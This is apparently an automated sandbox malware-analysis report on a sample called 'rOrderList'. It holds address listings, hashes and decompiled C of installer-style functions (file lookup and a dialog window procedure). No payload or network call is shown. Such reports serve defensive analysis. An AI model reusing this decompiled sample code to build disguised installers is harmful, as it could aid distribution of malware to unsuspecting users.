                                                                                      0x004071a1
                                                                                      0x004071a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f52
                                                                                      0x00406f52
                                                                                      0x00406f55
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407291
                                                                                      0x00407295
                                                                                      0x004072b7
                                                                                      0x004072ba
                                                                                      0x004072c4
                                                                                      0x00000000
                                                                                      0x004072c4
                                                                                      0x00407297
                                                                                      0x0040729a
                                                                                      0x0040729e
                                                                                      0x004072a1
                                                                                      0x004072a1
                                                                                      0x004072a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734e
                                                                                      0x00407352
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407377
                                                                                      0x0040737e
                                                                                      0x00407385
                                                                                      0x00407385
                                                                                      0x00000000
                                                                                      0x00407385
                                                                                      0x00407354
                                                                                      0x00407357
                                                                                      0x0040735a
                                                                                      0x0040735d
                                                                                      0x00407364
                                                                                      0x004072a8
                                                                                      0x004072a8
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040743f
                                                                                      0x00407442
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407079
                                                                                      0x0040707b
                                                                                      0x00407082
                                                                                      0x00407083
                                                                                      0x00407085
                                                                                      0x00407088
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407090
                                                                                      0x00407093
                                                                                      0x00407096
                                                                                      0x00407098
                                                                                      0x0040709a
                                                                                      0x0040709a
                                                                                      0x0040709b
                                                                                      0x0040709e
                                                                                      0x004070a5
                                                                                      0x004070a8
                                                                                      0x004070b6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040738c
                                                                                      0x0040738c
                                                                                      0x0040738f
                                                                                      0x00407396
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040739b
                                                                                      0x0040739b
                                                                                      0x0040739f
                                                                                      0x004074d7
                                                                                      0x00000000
                                                                                      0x004074d7
                                                                                      0x004073a5
                                                                                      0x004073a8
                                                                                      0x004073ab
                                                                                      0x004073af
                                                                                      0x004073b2
                                                                                      0x004073b8
                                                                                      0x004073ba
                                                                                      0x004073ba
                                                                                      0x004073ba
                                                                                      0x004073bd
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c3
                                                                                      0x004073c3
                                                                                      0x004073c7
                                                                                      0x00407427
                                                                                      0x0040742a
                                                                                      0x0040742f
                                                                                      0x00407430
                                                                                      0x00407432
                                                                                      0x00407434
                                                                                      0x00407437
                                                                                      0x00000000
                                                                                      0x00407437
                                                                                      0x004073c9
                                                                                      0x004073cf
                                                                                      0x004073d2
                                                                                      0x004073d5
                                                                                      0x004073d8
                                                                                      0x004073db
                                                                                      0x004073de
                                                                                      0x004073e1
                                                                                      0x004073e4
                                                                                      0x004073e7
                                                                                      0x004073ea
                                                                                      0x00407403
                                                                                      0x00407406
                                                                                      0x00407409
                                                                                      0x0040740c
                                                                                      0x00407410
                                                                                      0x00407412
                                                                                      0x00407412
                                                                                      0x00407413
                                                                                      0x00407416
                                                                                      0x004073ec
                                                                                      0x004073ec
                                                                                      0x004073f4
                                                                                      0x004073f9
                                                                                      0x004073fb
                                                                                      0x004073fe
                                                                                      0x004073fe
                                                                                      0x00407419
                                                                                      0x00407420
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x004070be
                                                                                      0x004070c1
                                                                                      0x004070f7
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x0040722a
                                                                                      0x0040722a
                                                                                      0x0040722d
                                                                                      0x0040722f
                                                                                      0x004074b9
                                                                                      0x00000000
                                                                                      0x004074b9
                                                                                      0x00407235
                                                                                      0x00407238
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040723e
                                                                                      0x00407242
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00000000
                                                                                      0x00407245
                                                                                      0x004070c3
                                                                                      0x004070c5
                                                                                      0x004070c7
                                                                                      0x004070c9
                                                                                      0x004070cc
                                                                                      0x004070cd
                                                                                      0x004070cf
                                                                                      0x004070d1
                                                                                      0x004070d4
                                                                                      0x004070d7
                                                                                      0x004070ed
                                                                                      0x004070f2
                                                                                      0x0040712a
                                                                                      0x0040712a
                                                                                      0x0040712e
                                                                                      0x0040715a
                                                                                      0x0040715c
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407169
                                                                                      0x0040716e
                                                                                      0x0040716e
                                                                                      0x00407170
                                                                                      0x00407173
                                                                                      0x0040717a
                                                                                      0x0040717d
                                                                                      0x004071aa
                                                                                      0x004071aa
                                                                                      0x004071ad
                                                                                      0x004071b0
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00000000
                                                                                      0x00407224
                                                                                      0x004071b2
                                                                                      0x004071b8
                                                                                      0x004071bb
                                                                                      0x004071be
                                                                                      0x004071c1
                                                                                      0x004071c4
                                                                                      0x004071c7
                                                                                      0x004071ca
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d3
                                                                                      0x004071ec
                                                                                      0x004071ee
                                                                                      0x004071f1
                                                                                      0x004071f2
                                                                                      0x004071f5
                                                                                      0x004071f7
                                                                                      0x004071fa
                                                                                      0x004071fc
                                                                                      0x004071fe
                                                                                      0x00407201
                                                                                      0x00407203
                                                                                      0x00407206
                                                                                      0x0040720a
                                                                                      0x0040720c
                                                                                      0x0040720c
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x004071d5
                                                                                      0x004071d5
                                                                                      0x004071dd
                                                                                      0x004071e2
                                                                                      0x004071e4
                                                                                      0x004071e7
                                                                                      0x004071e7
                                                                                      0x00407216
                                                                                      0x0040721d
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x0040721d
                                                                                      0x00407130
                                                                                      0x00407133
                                                                                      0x00407135
                                                                                      0x00407138
                                                                                      0x0040713b
                                                                                      0x0040713e
                                                                                      0x00407140
                                                                                      0x00407143
                                                                                      0x00407146
                                                                                      0x00407146
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x0040714c
                                                                                      0x00407153
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00407153
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070de
                                                                                      0x004070e1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fcb
                                                                                      0x00406fcb
                                                                                      0x00406fcf
                                                                                      0x00407495
                                                                                      0x00000000
                                                                                      0x00407495
                                                                                      0x00406fd5
                                                                                      0x00406fd8
                                                                                      0x00406fdb
                                                                                      0x00406fde
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe3
                                                                                      0x00406fe6
                                                                                      0x00406fe9
                                                                                      0x00406fec
                                                                                      0x00406fef
                                                                                      0x00406ff2
                                                                                      0x00406ff3
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff8
                                                                                      0x00406ffb
                                                                                      0x00406ffe
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407004
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x0040724c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407252
                                                                                      0x00407255
                                                                                      0x00407258
                                                                                      0x0040725b
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x00407260
                                                                                      0x00407263
                                                                                      0x00407266
                                                                                      0x00407269
                                                                                      0x0040726c
                                                                                      0x0040726f
                                                                                      0x00407270
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407275
                                                                                      0x00407278
                                                                                      0x0040727b
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x00407285
                                                                                      0x00407287
                                                                                      0x0040728a
                                                                                      0x00000000
                                                                                      0x0040728c
                                                                                      0x00000000
                                                                                      0x0040728c
                                                                                      0x0040728a
                                                                                      0x004074bf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406aee

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                                                                                      • Instruction ID: b5fdc14d1eddcf89792e2e646b4c6bd06a53190dca3d1b375e16d2eed6ded591
                                                                                      • Opcode Fuzzy Hash: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                                                                                      • Instruction Fuzzy Hash: 78F16970D04229CBDF28CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040689A(WCHAR* _a4) {
                                                                                      				void* _t2;
                                                                                      
                                                                                      				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                                                      				if(_t2 == 0xffffffff) {
                                                                                      					return 0;
                                                                                      				}
                                                                                      				FindClose(_t2);
                                                                                      				return 0x426798;
                                                                                      			}




                                                                                      0x004068a5
                                                                                      0x004068ae
                                                                                      0x00000000
                                                                                      0x004068bb
                                                                                      0x004068b1
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50, 4%w.%w,?,77252EE0,00405C6E,?,77253420,77252EE0), ref: 004068A5
                                                                                      • FindClose.KERNEL32(00000000), ref: 004068B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                      • Instruction ID: 17741e7b15207d6702ed9fc8e7bdeca0d2b34881c01bff23dce0e4374d0b2feb
                                                                                      • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                      • Instruction Fuzzy Hash: 1FD0C7315051205BD24116346D4C84765985F55331311CA36B4A5F11A0C7348C3246AC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 41%
                                                                                      			E00402902(short __ebx, short* __edi) {
                                                                                      				void* _t8;
                                                                                      				void* _t21;
                                                                                      
                                                                                      				_t8 = FindFirstFileW(E00402D3E(2), _t21 - 0x2dc); // executed
                                                                                      				if(_t8 != 0xffffffff) {
                                                                                      					E00406483( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                      					_push(_t21 - 0x2b0);
                                                                                      					_push(__edi);
                                                                                      					E0040653C();
                                                                                      				} else {
                                                                                      					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                      					 *__edi = __ebx;
                                                                                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t21 - 4));
                                                                                      				return 0;
                                                                                      			}





                                                                                      0x00402911
                                                                                      0x0040291a
                                                                                      0x00402935
                                                                                      0x00402940
                                                                                      0x00402941
                                                                                      0x00402a7b
                                                                                      0x0040291c
                                                                                      0x0040291f
                                                                                      0x00402922
                                                                                      0x00402925
                                                                                      0x00402925
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402911
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: a4cb163a7d91971bb3cc2f8413b65b1a08e5d81cfbd66f3d87d9e3c78b3df682
                                                                                      • Instruction ID: e1d09971df8357d0b6d26b0e23bbdd0a86073f761c05595cd8bb911c59de634c
                                                                                      • Opcode Fuzzy Hash: a4cb163a7d91971bb3cc2f8413b65b1a08e5d81cfbd66f3d87d9e3c78b3df682
                                                                                      • Instruction Fuzzy Hash: C9F08C71A00104AFC700DFA4ED499AEB378EF10314F70857BE916F21E0D7B89E119B2A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 188 403fb9-403fcb 189 403fd1-403fd7 188->189 190 40410c-40411b 188->190 189->190 191 403fdd-403fe6 189->191 192 40416a-40417f 190->192 193 40411d-404165 GetDlgItem * 2 call 404492 SetClassLongW call 40140b 190->193 194 403fe8-403ff5 SetWindowPos 191->194 195 403ffb-403ffe 191->195 197 404181-404184 192->197 198 4041bf-4041c4 call 4044de 192->198 193->192 194->195 200 404000-404012 ShowWindow 195->200 201 404018-40401e 195->201 203 404186-404191 call 401389 197->203 204 4041b7-4041b9 197->204 206 4041c9-4041e4 198->206 200->201 207 404020-404035 DestroyWindow 201->207 208 40403a-40403d 201->208 203->204 219 404193-4041b2 SendMessageW 203->219 204->198 205 40445f 204->205 213 404461-404468 205->213 211 4041e6-4041e8 call 40140b 206->211 212 4041ed-4041f3 206->212 214 40443c-404442 207->214 216 404050-404056 208->216 217 40403f-40404b SetWindowLongW 208->217 211->212 222 4041f9-404204 212->222 223 40441d-404436 DestroyWindow KiUserCallbackDispatcher 212->223 214->205 221 404444-40444a 214->221 224 4040f9-404107 call 4044f9 216->224 225 40405c-40406d GetDlgItem 216->225 217->213 219->213 221->205 227 40444c-404455 ShowWindow 221->227 222->223 228 40420a-404257 call 406579 call 404492 * 3 GetDlgItem 222->228 223->214 224->213 229 40408c-40408f 225->229 230 40406f-404086 SendMessageW IsWindowEnabled 225->230 227->205 258 404261-40429d ShowWindow KiUserCallbackDispatcher call 4044b4 EnableWindow 228->258 259 404259-40425e 228->259 231 404091-404092 229->231 232 404094-404097 229->232 230->205 230->229 235 4040c2-4040c7 call 40446b 231->235 236 4040a5-4040aa 232->236 237 404099-40409f 232->237 235->224 239 4040e0-4040f3 SendMessageW 236->239 241 4040ac-4040b2 236->241 237->239 240 4040a1-4040a3 237->240 239->224 240->235 244 4040b4-4040ba call 40140b 241->244 245 4040c9-4040d2 call 40140b 241->245 256 4040c0 244->256 245->224 254 4040d4-4040de 245->254 254->256 256->235 262 4042a2 258->262 263 40429f-4042a0 258->263 259->258 264 4042a4-4042d2 GetSystemMenu EnableMenuItem SendMessageW 262->264 263->264 265 4042d4-4042e5 SendMessageW 264->265 266 4042e7 264->266 267 4042ed-40432c call 4044c7 call 403f9a call 40653c lstrlenW call 406579 SetWindowTextW call 401389 265->267 266->267 267->206 278 404332-404334 267->278 278->206 279 40433a-40433e 278->279 280 404340-404346 279->280 281 40435d-404371 DestroyWindow 279->281 280->205 282 40434c-404352 280->282 281->214 283 404377-4043a4 CreateDialogParamW 281->283 282->206 284 404358 282->284 283->214 285 4043aa-404401 call 404492 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 283->285 284->205 285->205 290 404403-404416 ShowWindow call 4044de 285->290 292 40441b 290->292 292->214
                                                                                      C-Code - Quality: 85%
                                                                                      			E00403FB9(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                      				struct HWND__* _v32;
                                                                                      				void* _v80;
                                                                                      				void* _v84;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t37;
                                                                                      				signed int _t39;
                                                                                      				signed int _t41;
                                                                                      				struct HWND__* _t51;
                                                                                      				signed int _t70;
                                                                                      				struct HWND__* _t76;
                                                                                      				signed int _t89;
                                                                                      				struct HWND__* _t94;
                                                                                      				signed int _t102;
                                                                                      				int _t106;
                                                                                      				signed int _t118;
                                                                                      				signed int _t119;
                                                                                      				int _t120;
                                                                                      				signed int _t125;
                                                                                      				struct HWND__* _t128;
                                                                                      				struct HWND__* _t129;
                                                                                      				int _t130;
                                                                                      				long _t133;
                                                                                      				int _t135;
                                                                                      				int _t136;
                                                                                      				void* _t137;
                                                                                      
                                                                                      				_t118 = _a8;
                                                                                      				if(_t118 == 0x110 || _t118 == 0x408) {
                                                                                      					_t37 = _a12;
                                                                                      					_t128 = _a4;
                                                                                      					__eflags = _t118 - 0x110;
                                                                                      					 *0x423730 = _t37;
                                                                                      					if(_t118 == 0x110) {
                                                                                      						 *0x42a268 = _t128;
                                                                                      						 *0x423744 = GetDlgItem(_t128, 1);
                                                                                      						_t94 = GetDlgItem(_t128, 2);
                                                                                      						_push(0xffffffff);
                                                                                      						_push(0x1c);
                                                                                      						 *0x421710 = _t94;
                                                                                      						E00404492(_t128);
                                                                                      						SetClassLongW(_t128, 0xfffffff2,  *0x429248);
                                                                                      						 *0x42922c = E0040140B(4);
                                                                                      						_t37 = 1;
                                                                                      						__eflags = 1;
                                                                                      						 *0x423730 = 1;
                                                                                      					}
                                                                                      					_t125 =  *0x40a39c; // 0x2
                                                                                      					_t136 = 0;
                                                                                      					_t133 = (_t125 << 6) +  *0x42a2a0;
                                                                                      					__eflags = _t125;
                                                                                      					if(_t125 < 0) {
                                                                                      						L34:
                                                                                      						E004044DE(0x40b);
                                                                                      						while(1) {
                                                                                      							_t39 =  *0x423730;
                                                                                      							 *0x40a39c =  *0x40a39c + _t39;
                                                                                      							_t133 = _t133 + (_t39 << 6);
                                                                                      							_t41 =  *0x40a39c; // 0x2
                                                                                      							__eflags = _t41 -  *0x42a2a4;
                                                                                      							if(_t41 ==  *0x42a2a4) {
                                                                                      								E0040140B(1);
                                                                                      							}
                                                                                      							__eflags =  *0x42922c - _t136;
                                                                                      							if( *0x42922c != _t136) {
                                                                                      								break;
                                                                                      							}
                                                                                      							__eflags =  *0x40a39c -  *0x42a2a4; // 0x2
                                                                                      							if(__eflags >= 0) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t119 =  *(_t133 + 0x14);
                                                                                      							E00406579(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                      							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                      							_push(0xfffffc19);
                                                                                      							E00404492(_t128);
                                                                                      							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                      							_push(0xfffffc1b);
                                                                                      							E00404492(_t128);
                                                                                      							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                      							_push(0xfffffc1a);
                                                                                      							E00404492(_t128);
                                                                                      							_t51 = GetDlgItem(_t128, 3);
                                                                                      							__eflags =  *0x42a30c - _t136;
                                                                                      							_v32 = _t51;
                                                                                      							if( *0x42a30c != _t136) {
                                                                                      								_t119 = _t119 & 0x0000fefd | 0x00000004;
                                                                                      								__eflags = _t119;
                                                                                      							}
                                                                                      							ShowWindow(_t51, _t119 & 0x00000008); // executed
                                                                                      							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
                                                                                      							E004044B4(_t119 & 0x00000002);
                                                                                      							_t120 = _t119 & 0x00000004;
                                                                                      							EnableWindow( *0x421710, _t120);
                                                                                      							__eflags = _t120 - _t136;
                                                                                      							if(_t120 == _t136) {
                                                                                      								_push(1);
                                                                                      							} else {
                                                                                      								_push(_t136);
                                                                                      							}
                                                                                      							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
                                                                                      							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
                                                                                      							__eflags =  *0x42a30c - _t136;
                                                                                      							if( *0x42a30c == _t136) {
                                                                                      								_push( *0x423744);
                                                                                      							} else {
                                                                                      								SendMessageW(_t128, 0x401, 2, _t136);
                                                                                      								_push( *0x421710);
                                                                                      							}
                                                                                      							E004044C7();
                                                                                      							E0040653C(0x423748, E00403F9A());
                                                                                      							E00406579(0x423748, _t128, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                      							SetWindowTextW(_t128, 0x423748); // executed
                                                                                      							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
                                                                                      							__eflags = _t70;
                                                                                      							if(_t70 != 0) {
                                                                                      								continue;
                                                                                      							} else {
                                                                                      								__eflags =  *_t133 - _t136;
                                                                                      								if( *_t133 == _t136) {
                                                                                      									continue;
                                                                                      								}
                                                                                      								__eflags =  *(_t133 + 4) - 5;
                                                                                      								if( *(_t133 + 4) != 5) {
                                                                                      									DestroyWindow( *0x429238); // executed
                                                                                      									 *0x422720 = _t133;
                                                                                      									__eflags =  *_t133 - _t136;
                                                                                      									if( *_t133 <= _t136) {
                                                                                      										goto L58;
                                                                                      									}
                                                                                      									_t76 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t128,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
                                                                                      									__eflags = _t76 - _t136;
                                                                                      									 *0x429238 = _t76;
                                                                                      									if(_t76 == _t136) {
                                                                                      										goto L58;
                                                                                      									}
                                                                                      									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                      									_push(6);
                                                                                      									E00404492(_t76);
                                                                                      									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
                                                                                      									ScreenToClient(_t128, _t137 + 0x10);
                                                                                      									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                      									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
                                                                                      									__eflags =  *0x42922c - _t136;
                                                                                      									if( *0x42922c != _t136) {
                                                                                      										goto L61;
                                                                                      									}
                                                                                      									ShowWindow( *0x429238, 8); // executed
                                                                                      									E004044DE(0x405);
                                                                                      									goto L58;
                                                                                      								}
                                                                                      								__eflags =  *0x42a30c - _t136;
                                                                                      								if( *0x42a30c != _t136) {
                                                                                      									goto L61;
                                                                                      								}
                                                                                      								__eflags =  *0x42a300 - _t136;
                                                                                      								if( *0x42a300 != _t136) {
                                                                                      									continue;
                                                                                      								}
                                                                                      								goto L61;
                                                                                      							}
                                                                                      						}
                                                                                      						DestroyWindow( *0x429238); // executed
                                                                                      						 *0x42a268 = _t136;
                                                                                      						EndDialog(_t128,  *0x421f18); // executed
                                                                                      						goto L58;
                                                                                      					} else {
                                                                                      						__eflags = _t37 - 1;
                                                                                      						if(_t37 != 1) {
                                                                                      							L33:
                                                                                      							__eflags =  *_t133 - _t136;
                                                                                      							if( *_t133 == _t136) {
                                                                                      								goto L61;
                                                                                      							}
                                                                                      							goto L34;
                                                                                      						}
                                                                                      						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
                                                                                      						__eflags = _t89;
                                                                                      						if(_t89 == 0) {
                                                                                      							goto L33;
                                                                                      						}
                                                                                      						SendMessageW( *0x429238, 0x40f, 0, 1);
                                                                                      						__eflags =  *0x42922c;
                                                                                      						return 0 |  *0x42922c == 0x00000000;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t128 = _a4;
                                                                                      					_t136 = 0;
                                                                                      					if(_t118 == 0x47) {
                                                                                      						SetWindowPos( *0x423728, _t128, 0, 0, 0, 0, 0x13);
                                                                                      					}
                                                                                      					if(_t118 == 5) {
                                                                                      						asm("sbb eax, eax");
                                                                                      						ShowWindow( *0x423728,  ~(_a12 - 1) & _t118);
                                                                                      					}
                                                                                      					if(_t118 != 0x40d) {
                                                                                      						__eflags = _t118 - 0x11;
                                                                                      						if(_t118 != 0x11) {
                                                                                      							__eflags = _t118 - 0x111;
                                                                                      							if(_t118 != 0x111) {
                                                                                      								L26:
                                                                                      								return E004044F9(_t118, _a12, _a16);
                                                                                      							}
                                                                                      							_t135 = _a12 & 0x0000ffff;
                                                                                      							_t129 = GetDlgItem(_t128, _t135);
                                                                                      							__eflags = _t129 - _t136;
                                                                                      							if(_t129 == _t136) {
                                                                                      								L13:
                                                                                      								__eflags = _t135 - 1;
                                                                                      								if(_t135 != 1) {
                                                                                      									__eflags = _t135 - 3;
                                                                                      									if(_t135 != 3) {
                                                                                      										_t130 = 2;
                                                                                      										__eflags = _t135 - _t130;
                                                                                      										if(_t135 != _t130) {
                                                                                      											L25:
                                                                                      											SendMessageW( *0x429238, 0x111, _a12, _a16);
                                                                                      											goto L26;
